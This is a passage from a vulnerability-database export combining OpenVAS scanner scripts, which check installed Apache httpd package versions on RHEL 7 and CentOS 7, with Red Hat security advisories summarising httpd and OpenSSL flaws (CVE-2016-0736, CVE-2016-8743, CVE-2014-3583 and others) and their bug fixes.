(CVE-2016-2161)\n\n * It was discovered that the HTTP parser in httpd incorrectly allowed\ncertain characters not permitted by the HTTP protocol specification to\nappear unencoded in HTTP request headers. If httpd was used in conjunction\nwith a proxy or backend server that interpreted those characters\ndifferently, a remote attacker could possibly use this flaw to inject data\ninto HTTP responses, resulting in proxy cache poisoning. (CVE-2016-8743)\n\nNote: The fix for the CVE-2016-8743 issue causes httpd to return '400 Bad\nRequest' error to HTTP clients which do not strictly follow HTTP protocol\nspecification. A newly introduced configuration directive\n'HttpProtocolOptions Unsafe' can be used to re-enable the old less strict\nparsing. However, such setting also re-introduces the CVE-2016-8743 issue.\n\nBug Fix(es):\n\n * When waking up child processes during a graceful restart, the httpd\nparent process could attempt to open more connections than necessary if a\nlarge number of child processes had been active prior to the restart.\nConsequently, a graceful restart could take a long time to complete. With\nthis update, httpd has been fixed to limit the number of connections opened\nduring a graceful restart to the number of active children, and the\ndescribed problem no longer occurs. (BZ#1420002)\n\n * Previously, httpd running in a container returned the 500 HTTP status\ncode (Internal Server Error) when a connection to a WebSocket server was\nclosed. As a consequence, the httpd server failed to deliver the correct\nHTTP status and data to a client. With this update, httpd correctly handles\nall proxied requests to the WebSocket server, and the described problem no\nlonger occurs. (BZ#1429947)\n\n * In a configuration using LDAP authentication with the mod_authnz_ldap\nmodule, the name set using the AuthLDAPBindDN directive was not correctly\nused to bind to the LDAP server for all queries. Consequently,\nauthorization attempts failed. 
The LDAP modules have been fixed to ensure\nthe configured name is correctly bound for LDAP queries, and authorization\nusing LDAP no longer fails. (BZ#1420047)\");\n script_tag(name:\"affected\", value:\"httpd on\n Red Hat Enterprise Linux Server (v. 7)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"RHSA\", value:\"2017:0906-01\");\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2017-April/msg00021.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_7\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_7\")\n{\n\n if ((res = isrpmvuln(pkg:\"httpd-manual\", rpm:\"httpd-manual~2.4.6~45.el7_3.4\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd\", rpm:\"httpd~2.4.6~45.el7_3.4\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-debuginfo\", rpm:\"httpd-debuginfo~2.4.6~45.el7_3.4\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-devel\", rpm:\"httpd-devel~2.4.6~45.el7_3.4\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-tools\", rpm:\"httpd-tools~2.4.6~45.el7_3.4\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mod_ssl\", rpm:\"mod_ssl~2.4.6~45.el7_3.4\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n 
exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:34:32", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-2161", "CVE-2016-8743", "CVE-2016-0736"], "description": "Check the version of httpd", "modified": "2019-03-08T00:00:00", "published": "2017-04-14T00:00:00", "id": "OPENVAS:1361412562310882692", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310882692", "type": "openvas", "title": "CentOS Update for httpd CESA-2017:0906 centos7", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for httpd CESA-2017:0906 centos7\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.882692\");\n script_version(\"$Revision: 14058 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-08 14:25:52 +0100 (Fri, 08 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-04-14 06:30:21 +0200 (Fri, 14 Apr 2017)\");\n script_cve_id(\"CVE-2016-0736\", \"CVE-2016-2161\", \"CVE-2016-8743\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"CentOS Update for httpd CESA-2017:0906 centos7\");\n script_tag(name:\"summary\", value:\"Check the version of httpd\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"The httpd packages provide the Apache HTTP\nServer, a powerful, efficient, and extensible web server.\n\nSecurity Fix(es):\n\n * It was discovered that the mod_session_crypto module of httpd did not use\nany mechanisms to verify integrity of the encrypted session data stored in\nthe user's browser. A remote attacker could use this flaw to decrypt and\nmodify session data using a padding oracle attack. (CVE-2016-0736)\n\n * It was discovered that the mod_auth_digest module of httpd did not\nproperly check for memory allocation failures. A remote attacker could use\nthis flaw to cause httpd child processes to repeatedly crash if the server\nused HTTP digest authentication. 
(CVE-2016-2161)\n\n * It was discovered that the HTTP parser in httpd incorrectly allowed\ncertain characters not permitted by the HTTP protocol specification to\nappear unencoded in HTTP request headers. If httpd was used in conjunction\nwith a proxy or backend server that interpreted those characters\ndifferently, a remote attacker could possibly use this flaw to inject data\ninto HTTP responses, resulting in proxy cache poisoning. (CVE-2016-8743)\n\nNote: The fix for the CVE-2016-8743 issue causes httpd to return '400 Bad\nRequest' error to HTTP clients which do not strictly follow HTTP protocol\nspecification. A newly introduced configuration directive\n'HttpProtocolOptions Unsafe' can be used to re-enable the old less strict\nparsing. However, such setting also re-introduces the CVE-2016-8743 issue.\n\nBug Fix(es):\n\n * When waking up child processes during a graceful restart, the httpd\nparent process could attempt to open more connections than necessary if a\nlarge number of child processes had been active prior to the restart.\nConsequently, a graceful restart could take a long time to complete. With\nthis update, httpd has been fixed to limit the number of connections opened\nduring a graceful restart to the number of active children, and the\ndescribed problem no longer occurs. (BZ#1420002)\n\n * Previously, httpd running in a container returned the 500 HTTP status\ncode (Internal Server Error) when a connection to a WebSocket server was\nclosed. As a consequence, the httpd server failed to deliver the correct\nHTTP status and data to a client. With this update, httpd correctly handles\nall proxied requests to the WebSocket server, and the described problem no\nlonger occurs. (BZ#1429947)\n\n * In a configuration using LDAP authentication with the mod_authnz_ldap\nmodule, the name set using the AuthLDAPBindDN directive was not correctly\nused to bind to the LDAP server for all queries. Consequently,\nauthorization attempts failed. 
The LDAP modules have been fixed to ensure\nthe configured name is correctly bound for LDAP queries, and authorization\nusing LDAP no longer fails. (BZ#1420047)\");\n script_tag(name:\"affected\", value:\"httpd on CentOS 7\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"CESA\", value:\"2017:0906\");\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2017-April/022380.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS7\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS7\")\n{\n\n if ((res = isrpmvuln(pkg:\"httpd\", rpm:\"httpd~2.4.6~45.el7.centos.4\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-devel\", rpm:\"httpd-devel~2.4.6~45.el7.centos.4\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-manual\", rpm:\"httpd-manual~2.4.6~45.el7.centos.4\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-tools\", rpm:\"httpd-tools~2.4.6~45.el7.centos.4\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mod_ldap\", rpm:\"mod_ldap~2.4.6~45.el7.centos.4\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mod_proxy_html\", rpm:\"mod_proxy_html~2.4.6~45.el7.centos.4\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n 
exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mod_session\", rpm:\"mod_session~2.4.6~45.el7.centos.4\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mod_ssl\", rpm:\"mod_ssl~2.4.6~45.el7.centos.4\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-07-17T14:27:45", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-3583"], "description": "This host is installed with Apache HTTP Server\n and is prone to denial of service vulnerability.", "modified": "2019-07-05T00:00:00", "published": "2015-05-27T00:00:00", "id": "OPENVAS:1361412562310805636", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310805636", "type": "openvas", "title": "Apache HTTP Server Mod_Proxi_Fcgi Denial of service Vulnerability May15", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Apache HTTP Server Mod_Proxi_Fcgi Denial of service Vulnerability May15\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apache:http_server\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.805636\");\n script_version(\"2019-07-05T09:54:18+0000\");\n script_cve_id(\"CVE-2014-3583\");\n script_bugtraq_id(71657);\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-07-05 09:54:18 +0000 (Fri, 05 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2015-05-27 12:15:46 +0530 (Wed, 27 May 2015)\");\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\"); # Only vulnerable if mod_proxy_fcgi is enabled\n script_name(\"Apache HTTP Server Mod_Proxi_Fcgi Denial of service Vulnerability May15\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Apache HTTP Server\n and is prone to denial of service vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Flaw is due to an out-of-bounds read\n condition in the 'handle_headers' function in mod_proxy_fcgi that is triggered\n as user-supplied input is not properly validated when handling responses from\n FastCGI servers.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow a remote\n attackers to cause a denial of service via specially crafted response.\");\n\n script_tag(name:\"affected\", value:\"Apache HTTP Server version 2.4.10.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to version 2.4.12 or\n later.\");\n\n script_tag(name:\"solution_type\", 
value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1163555\");\n script_xref(name:\"URL\", value:\"http://httpd.apache.org/security/vulnerabilities_24.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Web Servers\");\n script_dependencies(\"secpod_apache_detect.nasl\");\n script_mandatory_keys(\"apache/installed\");\n script_require_ports(\"Services/www\", 80);\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!httpd_port = get_app_port(cpe:CPE)){\n exit(0);\n}\n\nif(!httpd_ver = get_app_version(cpe:CPE, port:httpd_port)){\n exit(0);\n}\n\nif(version_is_equal(version:httpd_ver, test_version:\"2.4.10\"))\n{\n report = 'Installed version: ' + httpd_ver + '\\n' +\n 'Fixed version: ' + \"2.4.12\" + '\\n';\n security_message(data:report, port:httpd_port);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "redhat": [{"lastseen": "2020-08-27T02:07:03", "bulletinFamily": "unix", "cvelist": ["CVE-2016-0736", "CVE-2016-1546", "CVE-2016-2161", "CVE-2016-8740", "CVE-2016-8743", "CVE-2020-11985"], "description": "The Apache HTTP Server is a powerful, efficient, and extensible web server. The httpd24 packages provide a recent stable release of version 2.4 of the Apache HTTP Server, along with the mod_auth_kerb module.\n\nThe httpd24 Software Collection has been upgraded to version 2.4.25, which provides a number of bug fixes and enhancements over the previous version. For detailed changes, see the Red Hat Software Collections 2.4 Release Notes linked from the References section. (BZ#1404778)\n\nSecurity Fix(es):\n\n* It was discovered that the mod_session_crypto module of httpd did not use any mechanisms to verify integrity of the encrypted session data stored in the user's browser. 
A remote attacker could use this flaw to decrypt and modify session data using a padding oracle attack. (CVE-2016-0736)\n\n* A denial of service flaw was found in httpd's mod_http2 module. A remote attacker could use this flaw to block server threads for long times, causing starvation of worker threads, by manipulating the flow control windows on streams. (CVE-2016-1546)\n\n* It was discovered that the mod_auth_digest module of httpd did not properly check for memory allocation failures. A remote attacker could use this flaw to cause httpd child processes to repeatedly crash if the server used HTTP digest authentication. (CVE-2016-2161)\n\n* It was discovered that the HTTP parser in httpd incorrectly allowed certain characters not permitted by the HTTP protocol specification to appear unencoded in HTTP request headers. If httpd was used in conjunction with a proxy or backend server that interpreted those characters differently, a remote attacker could possibly use this flaw to inject data into HTTP responses, resulting in proxy cache poisoning. (CVE-2016-8743)\n\nNote: The fix for the CVE-2016-8743 issue causes httpd to return \"400 Bad Request\" error to HTTP clients which do not strictly follow HTTP protocol specification. A newly introduced configuration directive \"HttpProtocolOptions Unsafe\" can be used to re-enable the old less strict parsing. However, such setting also re-introduces the CVE-2016-8743 issue.\n\n* A vulnerability was found in httpd's handling of the LimitRequestFields directive in mod_http2, affecting servers with HTTP/2 enabled. An attacker could send crafted requests with headers larger than the server's available memory, causing httpd to crash. 
(CVE-2016-8740)", "modified": "2020-08-27T05:54:32", "published": "2017-04-26T13:54:23", "id": "RHSA-2017:1161", "href": "https://access.redhat.com/errata/RHSA-2017:1161", "type": "redhat", "title": "(RHSA-2017:1161) Moderate: httpd24-httpd security, bug fix, and enhancement update", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-01-17T07:36:58", "bulletinFamily": "unix", "cvelist": ["CVE-2016-0736", "CVE-2016-2161", "CVE-2016-4975", "CVE-2016-8743"], "description": "The httpd packages provide the Apache HTTP Server, a powerful, efficient, and extensible web server.\n\nSecurity Fix(es):\n\n* It was discovered that the mod_session_crypto module of httpd did not use any mechanisms to verify integrity of the encrypted session data stored in the user's browser. A remote attacker could use this flaw to decrypt and modify session data using a padding oracle attack. (CVE-2016-0736)\n\n* It was discovered that the mod_auth_digest module of httpd did not properly check for memory allocation failures. A remote attacker could use this flaw to cause httpd child processes to repeatedly crash if the server used HTTP digest authentication. (CVE-2016-2161)\n\n* It was discovered that the HTTP parser in httpd incorrectly allowed certain characters not permitted by the HTTP protocol specification to appear unencoded in HTTP request headers. If httpd was used in conjunction with a proxy or backend server that interpreted those characters differently, a remote attacker could possibly use this flaw to inject data into HTTP responses, resulting in proxy cache poisoning. (CVE-2016-8743)\n\nNote: The fix for the CVE-2016-8743 issue causes httpd to return \"400 Bad Request\" error to HTTP clients which do not strictly follow HTTP protocol specification. A newly introduced configuration directive \"HttpProtocolOptions Unsafe\" can be used to re-enable the old less strict parsing. 
However, such setting also re-introduces the CVE-2016-8743 issue.\n\nBug Fix(es):\n\n* When waking up child processes during a graceful restart, the httpd parent process could attempt to open more connections than necessary if a large number of child processes had been active prior to the restart. Consequently, a graceful restart could take a long time to complete. With this update, httpd has been fixed to limit the number of connections opened during a graceful restart to the number of active children, and the described problem no longer occurs. (BZ#1420002)\n\n* Previously, httpd running in a container returned the 500 HTTP status code (Internal Server Error) when a connection to a WebSocket server was closed. As a consequence, the httpd server failed to deliver the correct HTTP status and data to a client. With this update, httpd correctly handles all proxied requests to the WebSocket server, and the described problem no longer occurs. (BZ#1429947)\n\n* In a configuration using LDAP authentication with the mod_authnz_ldap module, the name set using the AuthLDAPBindDN directive was not correctly used to bind to the LDAP server for all queries. Consequently, authorization attempts failed. The LDAP modules have been fixed to ensure the configured name is correctly bound for LDAP queries, and authorization using LDAP no longer fails. (BZ#1420047)", "modified": "2020-01-17T12:05:59", "published": "2017-04-12T14:02:46", "id": "RHSA-2017:0906", "href": "https://access.redhat.com/errata/RHSA-2017:0906", "type": "redhat", "title": "(RHSA-2017:0906) Moderate: httpd security and bug fix update", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T14:35:31", "bulletinFamily": "unix", "cvelist": ["CVE-2016-0736", "CVE-2016-2161", "CVE-2016-6304", "CVE-2016-7056", "CVE-2016-8610", "CVE-2016-8740", "CVE-2016-8743"], "description": "Red Hat JBoss Core Services is a set of supplementary software for Red Hat JBoss middleware products. 
This software, such as Apache HTTP Server, is common to multiple JBoss middleware products, and is packaged under Red Hat JBoss Core Services to allow for faster distribution of updates, and for a more consistent update experience.\n\nThis release of Red Hat JBoss Core Services Apache HTTP Server 2.4.23 Service Pack 1 serves as a replacement for Red Hat JBoss Core Services Apache HTTP Server 2.4.23, and includes bug fixes, which are documented in the Release Notes document linked to in the References.\n\nSecurity Fix(es):\n\n* A memory leak flaw was found in the way OpenSSL handled TLS status request extension data during session renegotiation. A remote attacker could cause a TLS server using OpenSSL to consume an excessive amount of memory and, possibly, exit unexpectedly after exhausting all available memory, if it enabled OCSP stapling support. (CVE-2016-6304)\n\n* It was discovered that the mod_session_crypto module of httpd did not use any mechanisms to verify integrity of the encrypted session data stored in the user's browser. A remote attacker could use this flaw to decrypt and modify session data using a padding oracle attack. (CVE-2016-0736)\n\n* It was discovered that the mod_auth_digest module of httpd did not properly check for memory allocation failures. A remote attacker could use this flaw to cause httpd child processes to repeatedly crash if the server used HTTP digest authentication. (CVE-2016-2161)\n\n* A timing attack flaw was found in OpenSSL that could allow a malicious user with local access to recover ECDSA P-256 private keys. (CVE-2016-7056)\n\n* A denial of service flaw was found in the way the TLS/SSL protocol defined processing of ALERT packets during a connection handshake. A remote attacker could use this flaw to make a TLS/SSL server consume an excessive amount of CPU and fail to accept connections from other clients. 
(CVE-2016-8610)\n\n* It was discovered that the HTTP parser in httpd incorrectly allowed certain characters not permitted by the HTTP protocol specification to appear unencoded in HTTP request headers. If httpd was used in conjunction with a proxy or backend server that interpreted those characters differently, a remote attacker could possibly use this flaw to inject data into HTTP responses, resulting in proxy cache poisoning. (CVE-2016-8743)\n\n* A vulnerability was found in httpd's handling of the LimitRequestFields directive in mod_http2, affecting servers with HTTP/2 enabled. An attacker could send crafted requests with headers larger than the server's available memory, causing httpd to crash. (CVE-2016-8740)\n\nRed Hat would like to thank the OpenSSL project for reporting CVE-2016-6304 and Shi Lei (Gear Team of Qihoo 360 Inc.) for reporting CVE-2016-8610. Upstream acknowledges Shi Lei (Gear Team of Qihoo 360 Inc.) as the original reporter of CVE-2016-6304.", "modified": "2017-07-25T00:12:41", "published": "2017-06-07T21:34:13", "id": "RHSA-2017:1415", "href": "https://access.redhat.com/errata/RHSA-2017:1415", "type": "redhat", "title": "(RHSA-2017:1415) Important: Red Hat JBoss Core Services Apache HTTP Server 2.4.23 Service Pack 1", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-08-13T18:47:08", "bulletinFamily": "unix", "cvelist": ["CVE-2016-0736", "CVE-2016-2161", "CVE-2016-6304", "CVE-2016-7056", "CVE-2016-8610", "CVE-2016-8740", "CVE-2016-8743"], "description": "Red Hat JBoss Core Services is a set of supplementary software for Red Hat JBoss middleware products. 
This software, such as Apache HTTP Server, is common to multiple JBoss middleware products, and is packaged under Red Hat JBoss Core Services to allow for faster distribution of updates, and for a more consistent update experience.\n\nThis release of Red Hat JBoss Core Services Apache HTTP Server 2.4.23 Service Pack 1 serves as a replacement for Red Hat JBoss Core Services Apache HTTP Server 2.4.23, and includes bug fixes, which are documented in the Release Notes document linked to in the References.\n\nSecurity Fix(es):\n\n* A memory leak flaw was found in the way OpenSSL handled TLS status request extension data during session renegotiation. A remote attacker could cause a TLS server using OpenSSL to consume an excessive amount of memory and, possibly, exit unexpectedly after exhausting all available memory, if it enabled OCSP stapling support. (CVE-2016-6304)\n\n* It was discovered that the mod_session_crypto module of httpd did not use any mechanisms to verify integrity of the encrypted session data stored in the user's browser. A remote attacker could use this flaw to decrypt and modify session data using a padding oracle attack. (CVE-2016-0736)\n\n* It was discovered that the mod_auth_digest module of httpd did not properly check for memory allocation failures. A remote attacker could use this flaw to cause httpd child processes to repeatedly crash if the server used HTTP digest authentication. (CVE-2016-2161)\n\n* A timing attack flaw was found in OpenSSL that could allow a malicious user with local access to recover ECDSA P-256 private keys. (CVE-2016-7056)\n\n* A denial of service flaw was found in the way the TLS/SSL protocol defined processing of ALERT packets during a connection handshake. A remote attacker could use this flaw to make a TLS/SSL server consume an excessive amount of CPU and fail to accept connections from other clients. 
(CVE-2016-8610)\n\n* It was discovered that the HTTP parser in httpd incorrectly allowed certain characters not permitted by the HTTP protocol specification to appear unencoded in HTTP request headers. If httpd was used in conjunction with a proxy or backend server that interpreted those characters differently, a remote attacker could possibly use this flaw to inject data into HTTP responses, resulting in proxy cache poisoning. (CVE-2016-8743)\n\n* A vulnerability was found in httpd's handling of the LimitRequestFields directive in mod_http2, affecting servers with HTTP/2 enabled. An attacker could send crafted requests with headers larger than the server's available memory, causing httpd to crash. (CVE-2016-8740)\n\nRed Hat would like to thank the OpenSSL project for reporting CVE-2016-6304 and Shi Lei (Gear Team of Qihoo 360 Inc.) for reporting CVE-2016-8610. Upstream acknowledges Shi Lei (Gear Team of Qihoo 360 Inc.) as the original reporter of CVE-2016-6304.", "modified": "2017-06-07T21:36:42", "published": "2017-06-07T21:33:56", "id": "RHSA-2017:1414", "href": "https://access.redhat.com/errata/RHSA-2017:1414", "type": "redhat", "title": "(RHSA-2017:1414) Important: Red Hat JBoss Core Services Apache HTTP Server 2.4.23 Service Pack 1 for RHEL 6", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-08-13T18:46:14", "bulletinFamily": "unix", "cvelist": ["CVE-2016-0736", "CVE-2016-2161", "CVE-2016-6304", "CVE-2016-7056", "CVE-2016-8610", "CVE-2016-8740", "CVE-2016-8743"], "description": "Red Hat JBoss Core Services is a set of supplementary software for Red Hat JBoss middleware products. 
This software, such as Apache HTTP Server, is common to multiple JBoss middleware products, and is packaged under Red Hat JBoss Core Services to allow for faster distribution of updates, and for a more consistent update experience.\n\nThis release of Red Hat JBoss Core Services Apache HTTP Server 2.4.23 Service Pack 1 serves as a replacement for Red Hat JBoss Core Services Apache HTTP Server 2.4.23, and includes bug fixes, which are documented in the Release Notes document linked to in the References.\n\nSecurity Fix(es):\n\n* A memory leak flaw was found in the way OpenSSL handled TLS status request extension data during session renegotiation. A remote attacker could cause a TLS server using OpenSSL to consume an excessive amount of memory and, possibly, exit unexpectedly after exhausting all available memory, if it enabled OCSP stapling support. (CVE-2016-6304)\n\n* It was discovered that the mod_session_crypto module of httpd did not use any mechanisms to verify integrity of the encrypted session data stored in the user's browser. A remote attacker could use this flaw to decrypt and modify session data using a padding oracle attack. (CVE-2016-0736)\n\n* It was discovered that the mod_auth_digest module of httpd did not properly check for memory allocation failures. A remote attacker could use this flaw to cause httpd child processes to repeatedly crash if the server used HTTP digest authentication. (CVE-2016-2161)\n\n* A timing attack flaw was found in OpenSSL that could allow a malicious user with local access to recover ECDSA P-256 private keys. (CVE-2016-7056)\n\n* A denial of service flaw was found in the way the TLS/SSL protocol defined processing of ALERT packets during a connection handshake. A remote attacker could use this flaw to make a TLS/SSL server consume an excessive amount of CPU and fail to accept connections from other clients. 
(CVE-2016-8610)\n\n* It was discovered that the HTTP parser in httpd incorrectly allowed certain characters not permitted by the HTTP protocol specification to appear unencoded in HTTP request headers. If httpd was used in conjunction with a proxy or backend server that interpreted those characters differently, a remote attacker could possibly use this flaw to inject data into HTTP responses, resulting in proxy cache poisoning. (CVE-2016-8743)\n\n* A vulnerability was found in httpd's handling of the LimitRequestFields directive in mod_http2, affecting servers with HTTP/2 enabled. An attacker could send crafted requests with headers larger than the server's available memory, causing httpd to crash. (CVE-2016-8740)\n\nRed Hat would like to thank the OpenSSL project for reporting CVE-2016-6304 and Shi Lei (Gear Team of Qihoo 360 Inc.) for reporting CVE-2016-8610. Upstream acknowledges Shi Lei (Gear Team of Qihoo 360 Inc.) as the original reporter of CVE-2016-6304.", "modified": "2017-06-07T21:35:54", "published": "2017-06-07T21:33:35", "id": "RHSA-2017:1413", "href": "https://access.redhat.com/errata/RHSA-2017:1413", "type": "redhat", "title": "(RHSA-2017:1413) Important: Red Hat JBoss Core Services Apache HTTP Server 2.4.23 Service Pack 1 for RHEL 7", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T14:34:41", "bulletinFamily": "unix", "cvelist": ["CVE-2014-3583"], "description": "Red Hat Ceph Storage is a massively scalable, open, software-defined\nstorage platform that combines the most stable version of the Ceph storage\nsystem with a Ceph management platform, deployment tools, and support\nservices.\n\nThe mod_proxy_fcgi package provides a proxy module for the Apache 2.2 HTTP\nserver.\n\nA buffer overflow flaw was found in mod_proxy_fcgi's handle_headers()\nfunction. 
A malicious FastCGI server that httpd is configured to connect to\ncould send a carefully crafted response that would cause an httpd child\nprocess handling the request to crash. (CVE-2014-3583)\n\nThis update also fixes the following bugs:\n\n* The RADOS gateway (RGW) can now properly decode the slash characters\n(\"/\") in clients' upload IDs. (BZ#1183182)\n\n* The RGW's object attribute updates could race with other object updates\noperations, which led to inconsistent object states, such as incomplete\nobject deletions. RGW now handles attribute updates correctly. (BZ#1206963)\n\n* Recreating a previously existing bucket in RGW did not remove the bucket\ninstance metadata object and created a redundant object in the RGW pool.\nThe redundant objects are no longer generated. (BZ#1212524)\n\n* The Content-Length header is now correctly created when creating a\ncontainer using the Swift API. (BZ#1213988)\n\n* RGW did not properly cache users' keystone tokens and validated all\nkeystone tokens for every Swift operation. RGW now caches tokens correctly,\nso that the token validation occurs only when necessary. (BZ#1213999)\n\n* Modifying a user's Access Control List (ACL) permissions for an object in\nRGW inappropriately caused the user to become the owner of the object.\nThis update fixes this bug. (BZ#1214051)\n\n* RGW could fail to update the bucket attributes during a Swift API \"POST\"\noperation. RGW now correctly updates the bucket attributes. (BZ#1214058)\n\n* RGW no longer terminated unexpectedly when using keystone authentication\nto copy an object. (BZ#1214061)\n\n* An attempt to download an object greater than 512 KB using a range header\nfailed when using the Swift API. 
